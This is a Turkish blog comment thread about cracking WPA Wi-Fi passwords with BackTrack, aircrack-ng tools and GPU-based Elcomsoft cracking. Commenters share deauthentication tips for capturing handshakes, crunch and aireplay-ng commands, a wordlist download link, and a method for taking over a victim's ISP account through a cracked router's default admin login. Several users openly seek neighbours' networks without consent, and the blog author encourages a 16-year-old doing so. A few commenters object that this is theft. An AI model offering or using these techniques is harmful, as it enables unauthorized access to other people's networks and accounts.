      Benimde elimde 11 haneli bir wordlist var diyelim ve wordlist’in içeriği şöyle olsun:
      aaaaaaaaaaa
      aaaaaaaaaab
      aaaaaaaaaac
      aaaaaaaaaad

      aaaaaaaaaaz
      aaaaaaaaaa1
      aaaaaaaaaa2
      aaaaaaaaaa3

      aplsqlt1q7q
      aplsqlt1q7r
      aplsqlt1q7s

      zzzzzzzzzzx
      zzzzzzzzzzy
      zzzzzzzzzzz

      gibi wordlist’im var. Toplam deneyeceğim şifre sayısı 37^11 yani 177917621779460413 eder.
      Ben bu şifreleri HD5970 ekran kartı işlemcisini kullanarak saniyede 103000 tane deneyerek 1727355551256 saniyede bulurum.(Elcomsoft’un sitesinde yazıyor değerler)
      1727355551256 saniye = 54774 yıl sürer.

      Evet, ben senin şifreni kırabilirim. Ama bunun için bilgisayarımı 54774 yıl açık bırakmam gerekir.

      En başında da dediğim gibi. WPA şifrelerini kafanızdan atın. Çünkü beyninizdeki bilgisayar saniyede 10trilyon işlem yapabilecek güçte.
      Çünkü 177917621779460413 (yüz yetmiş yedi katrilyon dokuz yüz on yedi trilyon altı yüz yirmi bir milyar yedi yüz yetmiş dokuz milyon dört yüz altmış bin dört yüz on üç) tane olasılıktan mantıklı olanları 10-15 saniye içinde bulabilecek kapasiteye sahipsiniz.

      ~~~~~~~~~~

      Biraz daha matematik;

      Eğer elimde 54774 tane HD5970 ekran kartlı makinan olsaydı 1 yılda çözerdim.
      Eğer elimde 657288 tane HD5970 ekran kartlı makinam olsaydı 1 ayda çözerdim
      Eğer elimde 19718640 tane HD5970 ekran kartlı makinam olsaydı 1 günde çözerdim.

      Ama senin modeminin yanına 20milyon makina ile gelseydim bişeyler döndüğünü anlardın 😀

      Buraya kadar okuduysanız teşekkür ederim 🙂

  115. #182 Mazlum tarafından, tarihinde

    Backtrack wpa şifrelerini kırıyor diye duymustum peki onda bir gerçeklik payı var mı ? Hatta wpa 2 yi kırdıklarını söylüyorlar

    • #183 Murat Çeşmecioğlu tarafından, tarihinde

      Zaten anlatımların hepsi backtrack ile yapıldı sitemde.

      Backtrack aircrack-ng programı ile belirttiğiniz wordlistteki kelimeleri deneyebiliyor. Anlattığım gibi ama ekran kartının işlemcisini kullanmadan düşünün. Çok çok daha uzun sürer.

      Sonuçta elinizdeki wordlistte o şifre varsa elbette kırılacaktır. Yoksa kıramazsınız.
      Herşey elinizdeki wordlistte bitiyor.

  116. #184 Mazlum tarafından, tarihinde

    Tamam tşkler Anladım 🙂

  117. #185 Kerem tarafından, tarihinde

    Murat Bey iyi günler. Web sayfanızda Metasploit ile işletim sistemine sızmak ile ilgili herhangi bir makale yayınlamayı düşünüyor musunuz? Eğer bu konuda bilginiz varsa lütfen bana “ms08_067_netapi” exploit komutundan sonra oluşan “Exploit complete, but no session was created” hatasını açıklayın mail olarak yada buradan. Sizden ricam mail atabilirseniz daha iyi olur 🙂 Sanırım W7 sistemlerde 445 portu kullanmak pek olanaklı değil..

    • #186 Murat Çeşmecioğlu tarafından, tarihinde

      Metasploit’i çok çok az kullanma fırsatım oldu. Daha bir makale yazabilecek kadar ustalaşamadım. Bu yüzden şimdilik düşünmüyorum.
      Dediğim gibi çok az kullandığım için hatanın nedeni hakkında bir yorumda bulunamayacağım. Eğer W7’den dolayı portu kullanamadığınızı düşünüyorsanız Linux üzerinden deneyebilirsiniz.

  118. #187 uzman tarafından, tarihinde

    merhaba
    gizli ssid adını nasıl bulacağız.
    mdk3 ile denemelerim oldu.fakat ssid adı çıkmadı
    gizli ssid var ama şifresiz.ataklarda isim çıkmıyor.
    wpa şifreli olanlar var onlarda ne yapmamız gerekli.
    öncelikle şifresiz gizli ssid adını bulmaya yardımcı olabilir misiniz?
    teşekkürler

  119. #188 ertugrul tarafından, tarihinde

    selamlar. size handshake dosyalarını göndersem kırabilirmisiniz? kazancda elde edebilrisin.

    • #189 Murat Çeşmecioğlu tarafından, tarihinde

      Güzel bir teklif fakat gerçekten elimde bir wordlistim bile yok.

      Ama teklifiniz ve fikriniz güzelmiş. Teşekkür ederim 🙂

  120. #190 ertugrul tarafından, tarihinde

    önemli değil. ama wpa kırmak için zaten şifreyide bir nevi bilmen gerkiyor. program kombinasyon şeklinde wordlis teki karakterleri karıp denemeler yapsa buda haftalarca pc nin açıkkalması demek olur. Wpa yı kırmak sayısal lotoyu tutturmak gibi bir şey. elimde 19 gb lık word list var ama nafile. 🙂

    • #191 Murat Çeşmecioğlu tarafından, tarihinde

      WPA için, hep söylediğim gibi, kafadan atmak en mantıklısı 🙂

  121. #192 ysf tarafından, tarihinde

    herkese kolay gelsin, yorumları tek tek okumak zmanımı alsa da 28 ve 30 mart 2011 tarihlerinde yorumda bulunan burak arkadasımızın dediği işe yarar cinsten ve dediği gibi ugraşsız tavsiyesi işime yaradı 🙂 teşekkürlerimi sunuyorum kendisine =))) ……

  122. #193 mustafa tarafından, tarihinde

    s.a çok merak ettiğim ve günlerdir laptopumda uğraştığım bişeyi sorcaktım size,wirelles mın gücü az olduğu için wirelles güçlendirici aldım a.p için.Buraya kadar herşey güzel backtack 4 ü virtual box ta sanal olarak çalıştırdım ve wirellesların driverlarını usb olarak virtual box a yükledim.
    ‘iwconfig’ komutuyla her iki wirelles ı da görüyor ve wirelles güçlendirinin interfacesi ”ra0”
    ‘airmon-ng start ra0’ komutunu veriyorum,ardından ‘airodum-ng ra0’ dediğim zaman dinlemeye geçiyorum fakat hiçbir kanal bulmuyor,laptoptaki wirelles ile tarıyorum 2-3 tane buluyor ama onda da statin(trafik) yok..Bi ara rastgele bişeyler yaptım ama tam hatırlamıyorum Ralink cihazında dinlemeye geçti ama sonra sanal makinayı kapattıktan sonra bi daha Ralinkten dinleme yapamadım..
    Ve 1 sorum daha var,aireplay yaparken wordlist i nasıl oluşturuyoruz veya usb de varsa backtrack te usb den nasıl alıyoruz,özellikle şu ”crunch” tan wordlist nasıl yapılıyor anlamış değilim,hangi sitede araştırdıysam sanki karşısındaki profesyonel cracker gibi anlatıyolar,lütfen bi yardımcı olun özellikle wirelles güçlendirici konusunda,dinleme yapabilmem için ne yapmam lazım ???

  123. #194 erdem tarafından, tarihinde

    yani kartımız broadcam ise,o notebook ile backtrack kullanamıyoruz? öyle mi?

    • #195 Murat Çeşmecioğlu tarafından, tarihinde

      Backtrack kullanabilirsiniz, internete girebilirsiniz. Ama, en azından ben, kartımı dinleme moduna alıp şifre kıramadım. Şifresini bildiğim bir ağa bağlanıp internete girebildim.

  124. #196 ertugrul tarafından, tarihinde

    Musthe :Arkadaşımız amatör kullanıcılar için neredeyse eksiksiz bir şekilde anlatmış. Ancak wpa şifresi kırmada anlatıma başlamadan önce wordlist vurgusu yapılmalı bence. Çünkü bu işin olmassa olmazı bu. 3-4 yıldır bu işle yoğun bir şekilde uğraştım. Bazı püf noktalardan da bahsetmek isterim. Murat beyin GRUB lu başlangıcını 3 sene kadar önce ne yazıkki 20-30 deneme sonucunda pc yi birkaç kez bozarak bulmuştum sizin işiniz gerçekten çok kolay olmuş 🙂 bt4 tavsiyemdir. Handshake yakalayamıyorum diyen arkadaşlar için ilk önerim KDE menüsünden Services den “Start Network Service” başlatmaları tabi daha öncesinde Wireless kartınızın dinleme modunu destekleyip desteklemediği daha önemli bir unsur. İkinci konu ise murat beyinde söylemiş olduğu gibi handshake yakalamış yalnız göremiyor olabilirsiniz. Modeme bağlı birine maksimum 10 deauth atağı uyguladığınızda %95 oranla bir handshake almışsınızdır. şimdi brute force işlemine bt de devam etmenizi önermiyorum. Şifre kırma işlemi için tabi ki EWSA yani elcomsoft iyi bir ekran kartına sahipseniz saniyede 50.000 kadar şifre deneyebiliyor. Hazır bu konuyu açmışken şunu belirteyim. Elinizde çok fazla wordlist bulundurmalısınız. ben wordlistler için harici 1 TB lik bir hdd almıştım 600 GB civarında wordlist var. tüm ev ve cep telefonları (türkcell,vodafone,avea), doğum tarihleri, türkçedeki tüm isimler ve isimlerin tüm doğum tarihleriyle eşleşmesi ahmet1956 gibi 8-9-10-11 haneli numara kombinasyonları ve birkaç bana özgü wordlist daha 12 ve üzeri sayılı kombinasyonlar TB lerce yer aldığından elimde bulunduramıyorum ancak bu ekipmanla yaklaşık 50-60 wpa ve wpa2 şifresi kırdım. Deneyimlerimden yola çıkarak en çok kullanılan şifrelerin; 18051985-19051905-123456789-123456789as-kullanıcının ev telefonu ve cep telefonu çok kullanılan şifreler arasında tabi arada sırada 11111111a gibi vb. şifrelerede rastlamak mümkün. bu tip wordlistlerde kombinasyonuna göre değişsede milyonlarca şifre bulunuyor ve makinanızın performansına bağlı olarak bt içersinde 400-500/sn şifre denemesiyle sanırım 3-4 ay alır şifreyi kırmak 🙂 Bu yüzden iyi bir ekran kartı +Elcomsoft öneriyorum. nVidia’nın tesla sı ile saniyede 100.000 şifre denenebildiğini duydum. bu gerçekten inanılmaz benim elimde ATI var ve saniyede 12.000 şifre görüyorum buda işimi oldukça kolaylaştırıyor. Bazı arkadaşlar Elcomsoftla ilgili bilgi istemiş kullanımı çok basittir. Bt üzerinde kaydetmiş olduğunuz xxx.cap adlı dosyayı windowsa taşıyın. Elcomsoftu çalıştırın file bölümünden import tmpdump dan .cap dosyanızı gösterin. Size hemen yakalanmış olan handshakeleri gösterecektir.(Bt arayüzünden “Wpa handshakes …) yazısı çıkmamış olsa bile) burdan handshakenizi tikleyin. 2. adım olarak optionsdan dictionary tıklayın en üstten kullanacağınız tüm wordlistleri programa gösterin. hemen alt bölümde “mutation” yani çiftleme bölümü vardır isteğinize bağlı olarak hepsini işaretleye bilir yada kaldırabilirsiniz. bu kullandığınız şifreleri clonlar örneğin wordlistinizde ahmet1956 olan şifreyi ikiler ve o şekilde de denemiş olur ahmet1956ahmet1956 gibi. Tavsiyem ilk etapta mutasyonun tamamını kapalı tutmanız yönündedir. Program pc nin tüm gücünü kullancaktır. Bu yüzden makineden elinizi kolunuzu çekmelisiniz. tüm bu ayarlamaların sonunda Elcomsoft anaekranından START ATTACK kısmıyla denemeler başlar. şifre bulunduğunda program otomatik durur ve size şifreyi verir. Son olarak GPU power kısmında ekran kartınızı görmelisiniz. “No compatible devices found” gibi bir yazı görüyorsanız ekran kartınız elcomsoftu desteklemiyordur yada ekran kartınızın güncellenmesi gerekiyordur. Elcomsoft öncesinde sitesinden hangi ekran kartlarının desteklendiğine bakmayı unutmayın. Ayrıca ekran kartınızın desteklenmediği durumda elcomsoftla cpu hızınızda (400-500/sn) işlem yapmaya devam edebilirsin ancak şifre bulma işleminiz oldukça uzayacaktır. bu işle uğraşıyorsanız desteklenen bir ekran kartı alın. Çok uzun yazmış olabilirim. Ancak bazı bildiğim şeyleri paylaşmak istedim. Herkese bol şans!

    handshake dosyalarını versem. emeğini karşılığınıda versem kişinini bilgilerinide versme kırmayı denermisin??;::D:d

  125. #199 Cevap pls tarafından, tarihinde

    ya ben hicbisi anlamadım wpa 2 yazıor kafadan atıom tutmuyorr 🙁

  126. #200 cengiz tarafından, tarihinde

    Son durum nedir arkadaşlar wpa ve ya wpa 2 kırmada yarımcı olabilecek var mı?

  127. #201 engin tarafından, tarihinde

    mrb hocam
    öncelikle elimizde wordlist yok nerden bulabiliriz?
    bulduk diyelim bunu nerede nasıl kullanacaz ? yani hangi dizin altında hangi komutu kullanacaz?

  128. #202 mustafa tarafından, tarihinde

    Ya backtrack in çoğu hamlelerini biliyorum,kendim wordlist te hazırlayabiliyorum,fakat şu wirelles güçlendiriden niye dinleme yapamıyorum onu anlamış değilim,nette gezinirken aynı benim gibi laptobunda wirellessi olup ta wirelles güçlendirici kullanan ve aynı marka ralink 2500 kullanan kişinin videosunu izledim,o dinleme yapıyor fakat ben yapamıyorum,fakat ben bt 4 kullanıyorum o bt 3 kullanıyodu,acaba bt 5 destekliyo mu,bilmiyorum ne yapcağımı varsa bi ayarı yapayım dicem ama yardım eden yok ki bu wirelles güçlendirici hakkında…
    Şunu da söyliyim nette birçok arkadaşın sıkıntısıdır bu handshake yakalayamama..
    sebebi ise sinyal gücüdür,dinleme yaptığınız zaman yukarda soldaki PWR yi kontrol edin eğer -1 den aşağıda ise handshake yapamayabilir,yani laptobun wirelles gücü yetersiz işte ben de bu yüzden wirelles güçlendirici aldım onda da dinleme yapamıyorum a.q,bi dinleme yapsam 50 60 gb a yakın wordlist hazırlayıp wpa veya wpa2 saldırısı yapıcam bu demek ki bu wordlistlerle kıramıcam şifre yok,özel karakter olsa bile…

  129. #203 Musthe tarafından, tarihinde

    ertugrul :

    Musthe :Arkadaşımız amatör kullanıcılar için neredeyse eksiksiz bir şekilde anlatmış. Ancak wpa şifresi kırmada anlatıma başlamadan önce wordlist vurgusu yapılmalı bence. Çünkü bu işin olmassa olmazı bu. 3-4 yıldır bu işle yoğun bir şekilde uğraştım. Bazı püf noktalardan da bahsetmek isterim. Murat beyin GRUB lu başlangıcını 3 sene kadar önce ne yazıkki 20-30 deneme sonucunda pc yi birkaç kez bozarak bulmuştum sizin işiniz gerçekten çok kolay olmuş 🙂 bt4 tavsiyemdir. Handshake yakalayamıyorum diyen arkadaşlar için ilk önerim KDE menüsünden Services den “Start Network Service” başlatmaları tabi daha öncesinde Wireless kartınızın dinleme modunu destekleyip desteklemediği daha önemli bir unsur. İkinci konu ise murat beyinde söylemiş olduğu gibi handshake yakalamış yalnız göremiyor olabilirsiniz. Modeme bağlı birine maksimum 10 deauth atağı uyguladığınızda %95 oranla bir handshake almışsınızdır. şimdi brute force işlemine bt de devam etmenizi önermiyorum. Şifre kırma işlemi için tabi ki EWSA yani elcomsoft iyi bir ekran kartına sahipseniz saniyede 50.000 kadar şifre deneyebiliyor. Hazır bu konuyu açmışken şunu belirteyim. Elinizde çok fazla wordlist bulundurmalısınız. ben wordlistler için harici 1 TB lik bir hdd almıştım 600 GB civarında wordlist var. tüm ev ve cep telefonları (türkcell,vodafone,avea), doğum tarihleri, türkçedeki tüm isimler ve isimlerin tüm doğum tarihleriyle eşleşmesi ahmet1956 gibi 8-9-10-11 haneli numara kombinasyonları ve birkaç bana özgü wordlist daha 12 ve üzeri sayılı kombinasyonlar TB lerce yer aldığından elimde bulunduramıyorum ancak bu ekipmanla yaklaşık 50-60 wpa ve wpa2 şifresi kırdım. Deneyimlerimden yola çıkarak en çok kullanılan şifrelerin; 18051985-19051905-123456789-123456789as-kullanıcının ev telefonu ve cep telefonu çok kullanılan şifreler arasında tabi arada sırada 11111111a gibi vb. şifrelerede rastlamak mümkün. bu tip wordlistlerde kombinasyonuna göre değişsede milyonlarca şifre bulunuyor ve makinanızın performansına bağlı olarak bt içersinde 400-500/sn şifre denemesiyle sanırım 3-4 ay alır şifreyi kırmak 🙂 Bu yüzden iyi bir ekran kartı +Elcomsoft öneriyorum. nVidia’nın tesla sı ile saniyede 100.000 şifre denenebildiğini duydum. bu gerçekten inanılmaz benim elimde ATI var ve saniyede 12.000 şifre görüyorum buda işimi oldukça kolaylaştırıyor. Bazı arkadaşlar Elcomsoftla ilgili bilgi istemiş kullanımı çok basittir. Bt üzerinde kaydetmiş olduğunuz xxx.cap adlı dosyayı windowsa taşıyın. Elcomsoftu çalıştırın file bölümünden import tmpdump dan .cap dosyanızı gösterin. Size hemen yakalanmış olan handshakeleri gösterecektir.(Bt arayüzünden “Wpa handshakes …) yazısı çıkmamış olsa bile) burdan handshakenizi tikleyin. 2. adım olarak optionsdan dictionary tıklayın en üstten kullanacağınız tüm wordlistleri programa gösterin. hemen alt bölümde “mutation” yani çiftleme bölümü vardır isteğinize bağlı olarak hepsini işaretleye bilir yada kaldırabilirsiniz. bu kullandığınız şifreleri clonlar örneğin wordlistinizde ahmet1956 olan şifreyi ikiler ve o şekilde de denemiş olur ahmet1956ahmet1956 gibi. Tavsiyem ilk etapta mutasyonun tamamını kapalı tutmanız yönündedir. Program pc nin tüm gücünü kullancaktır. Bu yüzden makineden elinizi kolunuzu çekmelisiniz. tüm bu ayarlamaların sonunda Elcomsoft anaekranından START ATTACK kısmıyla denemeler başlar. şifre bulunduğunda program otomatik durur ve size şifreyi verir. Son olarak GPU power kısmında ekran kartınızı görmelisiniz. “No compatible devices found” gibi bir yazı görüyorsanız ekran kartınız elcomsoftu desteklemiyordur yada ekran kartınızın güncellenmesi gerekiyordur. Elcomsoft öncesinde sitesinden hangi ekran kartlarının desteklendiğine bakmayı unutmayın. Ayrıca ekran kartınızın desteklenmediği durumda elcomsoftla cpu hızınızda (400-500/sn) işlem yapmaya devam edebilirsin ancak şifre bulma işleminiz oldukça uzayacaktır. bu işle uğraşıyorsanız desteklenen bir ekran kartı alın. Çok uzun yazmış olabilirim. Ancak bazı bildiğim şeyleri paylaşmak istedim. Herkese bol şans!

    handshake dosyalarını versem. emeğini karşılığınıda versem kişinini bilgilerinide versme kırmayı denermisin??;::D:d

    Burhan Şanlı :
    Göster ama verme derler ya ne güzel söylerler.
    Mümkünse bize wordlist adresi verebilirmisin yada kendi wordlistini bizle paylaşabilirmisin?

    engin :
    mrb hocam
    öncelikle elimizde wordlist yok nerden bulabiliriz?
    bulduk diyelim bunu nerede nasıl kullanacaz ? yani hangi dizin altında hangi komutu kullanacaz?

    Çok uzun zamandır vaktim olmuyor kusura bakmayın talepleriniz için biraz geç kalmış durumdayım. Arşivlerimi de saklamam paylaşırım halihazırda 50 GB lik wordlisti 4 kere sıkıştırarak 100 mb haline getirdim. Yazı dosyaları sıkıştırılmaya çok uygun iyi bir ekran kartı + elcomsoft ile maximum 6-8 saat içinde %50-70 oranında şifreyi kırma şansınız var. Ben uzun süre Teknik servisde çalıştığım için genelde profesyonel olmayan internet kullanıcıları tıpkı internet kullanıcı adı ve şifrelerinde ev telefonlarını kullandıkları için wireless şifrelerinide çekinmeden bu şekilde belirleyebiliyorlar. Ancak WPA nın hiç bir şekilde garantisi yoktur. Murat beyinde söylediği gibi wordlistlerdeki şifrelerin tutması gerekiyor. Wordlistlerin içinde 4-5-6-7 haneli wordlistlerde bulunmakta bunlar wpada işinize yaramaz diğerlerinin tamamını kullanabilirsiniz. Eğer ekran kartınız GPU teknolojisini desteklemiyorsa lütfen WPA ya bulaşmayın 🙂 Buyrun Wordlistlerim: https://rapidshare.com/files/3765428612/wordlists.rar Not: Çok daha fazla wordlist elimde bulunmakta ancak murat beyin hesapları doğru, kullanması yıllar alacağından vermiyorum en basit ve en çok kullanışlı wordlistleri sizinle paylaşıyorum. Wordlistlerin elcomsoftla nasıl kullanılacağını yukarda anlattım. Bt üzerinde zaten denemeyin o kadar uzun süre pc başında kalamassınız 🙂 Araştırmaktan korkmayın çok şey öğrenirsiniz. Teşekkürler.

    • #204 seaa tarafından, tarihinde

      murat ve mutse kardeşim paylaşımlarınız için sizlere çok teşekkür ediyorum uzun ugraslar sonucu sizlerin yardımı benim araştırmalrım sabrım sonucu şifre kırmayı başardım:)insanın kafasına koydugunda yapamayacagı birşey yoktur arkdaşlar pes etmeyin yılmayın aratırın deneyin ve yatarken nerde hata yaptıgınızı hayal edin baya bir yol aldım ben :)insanin kendisini geliştigini görmek çok güzel bir duygu herkese bol şans..hayatta hiçbirşey tesadüf degildir…

  130. #205 Musthe tarafından, tarihinde

    ayrıca deneyimlerinizi ve sonuçları paylaşırsanız memnun olurum 🙂

  131. #206 mustafa tarafından, tarihinde

    wordlist hazırlamak için öncelikle backtrack te crunch a ihtiyac var.Bunun için consol a;
    “cd /pentest/passwords/crunch” yazın.Ardından maximum ve minumum sayı-karakter-harf ayarlayalım,örneğin 5 ten 7 ye kafar “mustafa” ismini kombine edelim;
    “./crunch 5 7 mustafa -o /root/wordlist” (-o kaydedeceğiniz yeri gösterir,/root ise backtrack te masaüstü gibi bişey)
    eğer ki başta bi harf veya sayı sabit kalsın istiyorsanız ;
    “./crunch 7 7 mustafa -t m@@@@@@” yapmanız yeterli..
    veya sayılarla da yapabilirsiniz,örneğin 0 sayısının başa gelmesini istemiyorsanız eğer;
    “./crunch 4 4 0123 -t 1@@@ 2@@@ 3@@@” yapmanız yeterlidir..
    veya sayı harf karışımı yapmak isterseniz eğer backtrack in içerisindeki “charset.lst” den sayı-harf-özel karakter karışımını görebilirsiniz,ona da şu yolla gidebilirsiniz;
    “/pentest/passwords/charset” olarak system den girebilirsiniz..mesela sayı harf karışımı olarak;
    “./crunch 8 12 charset.lst mixalpha-numeric” tabi sonuna da kaydedeceğiniz yeri göstermeniz gerekir,yanlış bi yerim varsa affola,bildiğim kadarıyla anlattım,çünkü ben de bilirim çaresizlik nedir,her zaman paylaşımcı olmak ve bilmeyen kardeşlerimize yardımcı olmak istemişimdir..
    neyse ii günler Allaha emanet..

  132. #207 Musthe tarafından, tarihinde

    dün son yorumdan önce bazı açıklamalr yaptım ve wordlistlerimi paylaştım sanırım böyle bir paylaşım yasak murat bey yayınlamamış maille ulaşıp wordlist alabilirsiniz. musthe@gmail

  133. #208 Musthe tarafından, tarihinde

    özür diliyorum ben görmemişim 🙂 yukarda gözümden kaçmış

  134. #209 Vatandaş tarafından, tarihinde

    Peki benim canım arkadaşlarım.
    Şifreyi kırdınız. İzinsiz bir şekilde internet bağlantısını sağladınız.
    Peki sırtından geçindiğiniz adamın internet paketi sınırlı ise ne olacak. Doğal olarak aşım oluşmasına sebep olacaksınız.
    Adamcağıza anormal bir fatura gelecek.
    Yazık değil mi?
    Gidip müsaade alsanız, belki 5-10 lira bir katkı payı ödeyerek gönül rızasıyla olacak işi eşkiya sınıfına girerek halledeceksiniz.

    • #210 Murat Çeşmecioğlu tarafından, tarihinde

      Merhaba Vatandaş.
      Öncelikle keşke kendi isminizi yazsaydınız da hitap etmem daha kolay olsaydı diyerek başlıyorum.
      Benim burdaki amacım eşkiyalık yapmak yada başkalarının sırtından geçinmek değil. Burada sizin tepki gösterdiğiniz nokta bence bardağın ne tarafından baktığınızla ilgili. Birde şöyle düşünün: Siz burdaki bilgileri kullanarak WPA2 şifrelemesi ve 15-16 haneli alfanumerik bir şifre seçerek %99 oranında modeminize girilmesinden korunabileceğinizi öğrendiniz.
      Sonuçta ortada bir bilgi var ve bunu alıp nasıl kullanmak istediğinize karar vermek sizin elinizde. Bu işin nasıl yapıldığını öğrenip; kendinizi geliştirmek için de kullanabilirsiniz, kendinizi korumak için de…
      Siz; kablosuz şifrelerini kırmayı sadece izinsiz internet bağlantısı sağlamak için kullanıldığını düşünerek bardağın boş tarafından değil, dibinden bakıyorsunuz demektir 🙂

      • #211 PC meraklısı bir genç tarafından, tarihinde

        abi bana yardım edermisiniz işte facebook adresim ben daha 16 yasındayım babam net almıyor mahallemizde 2 tane kablosuz modem var şifrelerini kırabilirsem babam bana wi-fi cihazı alcakmıs lütfen yardım edin çok fazla anlamadım yukarıya yazdıklarınızdan şimdiden teşekkür ederim

        • #212 Murat Çeşmecioğlu tarafından, tarihinde

          Wireless adaptörünüzü aldıktan sonra anlattıklarımı uygulayın. Takıldığınız yerlerde buraya sorularınızı yazın. Çözüm bulmaya çalışırız.

  135. #213 falset tarafından, tarihinde

    Allah aşkına beini de minidwep ile yakaladığım handshakeyi windowsa nasıl alacağımı birisi anlatsın delirmek üzereyim. Beini yi flash diskten boot ediyorum. Kolay gelsin.

  136. #214 Musthe tarafından, tarihinde

    “Vatandaş :
    Peki benim canım arkadaşlarım.
    Şifreyi kırdınız. İzinsiz bir şekilde internet bağlantısını sağladınız.
    Peki sırtından geçindiğiniz adamın internet paketi sınırlı ise ne olacak. Doğal olarak aşım oluşmasına sebep olacaksınız.
    Adamcağıza anormal bir fatura gelecek.
    Yazık değil mi?
    Gidip müsaade alsanız, belki 5-10 lira bir katkı payı ödeyerek gönül rızasıyla olacak işi eşkiya sınıfına girerek halledeceksiniz.”

    Bu konuda haklısınız ama bunun amacı bilgi ve öğrenme eşkiyalık değil hocam benim kendi net bağlantım var çok fazla da şifre kırdım. ama hiç birini kullanmıyorum. Amaç kendimi geliştirmek bilinçlenmek ve bi nevi gerçek anketle bi psikoloji deneyimi yaşamaktı. Örneğin bende 3-4 sene öncesine kadar her şifrede cep telefonumu yazan biriydim ama şifre kırma denemelerine başladıktan sonra bunu değiştirdim. Kendimi oldukça geliştirdim.
    Çok farklı noktalara bile gittiği oldu olayın o kadar çok uraşmaya başladım ki modemlerle wireless özelliği olmayan bir yazıcıyı hiç bir kablo bağıda kullanmadan kendi laptopumdan kontrol etmenin bir yolunu buldum insanlar görünce şaşırıyorlar ama dediğim gibi amaç eşkiyalık değil öğrenmektir. Saygılar!

    • #215 Murat tarafından, tarihinde

      Hırsızlığın nasıl yapılacağını anlatıp sonrada adına “bilgilendirme amaçlı” diyemezsiniz. iyi o zaman , okullarda nasıl banka soyulacağını anlatsınlar ders olarak , sonrada adına bilgilendirme dersi denilsin. Bu tarz bilgilerin altında iyi niyet aranamaz. Ayrıca başkalarının internet bağlantısını kullanarak / şifre kırarak faydalanmak direk hırsızlıktır. kendinizi karşınızdakinin yerine koyun ve biraz sağduyulu davranın.

    • #216 Atakan tarafından, tarihinde

      Abi sen bari bak çözmüşsün bu işi sen bari bak .s
      Ben şu aşamaya : aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b 00:18:39:2B:4C:98 -h 00:17:c4:34:c7:de mon0 geldikten sonra packet read işlemi hiç bitmiyor. Yani ;

      aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b 00:08:5C:FE:E5:13 -h 00:08:5C:FE:E5:13 mon0
      The interface MAC (00:23:CD:BD:A1:96) doesn’t match the specified MAC (-h).
      ifconfig mon0 hw ether 00:08:5C:FE:E5:13
      42851 packets…

      Uzun süre böyle kalıyor. Packetler artıyor ama iş neticeye bağlanmıyor, nası yapıcaz?

  137. #217 aslan tarafından, tarihinde

    murat bey acil yardim lutfen öncelikle dururmumu anlatayaim öğrenciyim hemde evliyim esimde ögrenci:D evime internet baglatayim dedim fiyatlar malum ates pahasi gittim vodafon vin aldim aylik 8 liraya yavasda olsa isin içinden çikiyodum neyse bi gün çeken internet aglarina baktim bi tane var o da karsi sokataki bi dukkan gittim bi gun anlattim durumu ödediğiniz ücret neyse yarisini verim bende kullanim dedim adamda kabul etmedi neti sinirsiz biliyorm 7/24 açik şimdi bi de vodafonun 8 liralik sinirsiz net aboneligi bitmis mi kaldik netsiz e sen gelde bu adamin sifresini kirma yardimci olursaniz sevinirim yuklemem gerekenleri bi liste halinde verin pc ye yuklim eger olursa uzaktan baglanti yöntemiyle bilen birine kirdiririm artik olursa tabi simdiden tesekkürler

    • #218 Murat Çeşmecioğlu tarafından, tarihinde

      Ben sayfa sayfa ne anlatmışım bu sayfada? 😀
      Burda anlatılanları deneyin, takıldığınız yerde sorun. Yardımcı olabildiğim kadarıyla yardım ediyorum gördüğünüz gibi.

      • #219 mehmet tarafından, tarihinde

        hocam bizim komşumuzun sınırsız wireless hattı var kendisi türkiyede değil şuan istesem şifreyi verir ama burda olmadığı için telefon açmaya utanıyorum şimdii şifresini alıp türkiyeye geldiğinde söylliyeceğim bana rica etsem nasıl şifresini bulacağımı söyleyebilirmisiniz

    • #220 turquaz72 tarafından, tarihinde

      Merhaba Murat bey,

      Windows 7 64 bit işletim sistemi ile birlikte alfa wireless kullanıyorum. Backtrack 5 programını WMWARE üzerinde çalıştırıyorum. Yukarıdaki söylediklerinizin hepsini yaptım. wireless driverları RT2800USB. airodump -ng mon0 komutunda takılıp kaldım. Bir türlü dinleme yapmıyor. Hiç bir wireless bulamıyorum. Oysaki windows 7 de çalıştırdığımda 10larca wireless buluyorum. Her şeyi denedim. Yabancı yazılarıda okudum ama bu konuyla ilgili bir çözğme ulaşamadım. Sizce niye dinleme yapamıyorum? Teşekkürler

  138. #222 Metin tarafından, tarihinde

    hocam peki değerli zamanınızı alıyorum ama yaynı yöntemle wpa2 PSK şifreleri kırılabilirmi denedinimizmi hiç ben oldugum yerde hep bu şifrelerme yöntemiyle cok wifi var wep falan yok mecbur kaldım sormaya olmucaksa denemenın mantıgı yok yardımcı olurmusunuz tşkler

  139. #223 Metin tarafından, tarihinde

    hacaö bir sorudaha backtracı kurmadan turkce yapabılırmıyız yardımcı olursanız sevınırım

  140. #224 mertbenz tarafından, tarihinde

    BEnim gibi wireless şifresi kırmaya meraklı arkadaşlara bir tavsiyem olcak.kırdığınız ağın kotalımı kotasızmı olduğunu öğrenmek herkesin arzusudur.Öncelikle kırdığınız modemin arayüzüne girin genellikle giriş şifrelerini kimse değiştirmiyor(admin admin-admin ttnet-admin 1234)
    modemin içinde kayıtlı olan kullanıcı adı şifreyi alın şifre yıldızlı gözüksede yıldızlı şifreleri gösteren programlar mevcut.son olarak ttnetin sitesine girin tek şifre oluştura gerekli bilgileri girin ve sisteme kayıt olun.online işlemlerden kırdığınız ağın tüm fatura adres kota tarife bilgilerine erişebilir değiştirebilirsiniz.Bu bilgiyi sadece tarife öğrenme amaçla kullanmaznız amacıyla iyi çalışmalar.

  141. #225 mertbenz tarafından, tarihinde

    Arkadaşlar son zamanlarda bu japonlar wpa da bir açık bulmuşlar.tkip algoritmasında açık bulup şifreli modeme şifresiz bağlanmışlar.yani biz hep şifreyi kırmaya çalışıyoruz.Aslında ben biraz araşırdım ancak fazla bir bilgim yok kısaca modeme bir sinyal yollayıp modemi kandırıp modeme şifresiz bağlanıyormuş.yani adamlar wpa yı 20 sn de kırmış.aslında şu yabancı forumları bir karıştırmak lazım.ancak ciddi bir teknik bilgi gerektiriyor.Murat bey sizin bu konuda bir bilginiz varmı acaba)

  142. #226 Faclonetti Pistolero tarafından, tarihinde

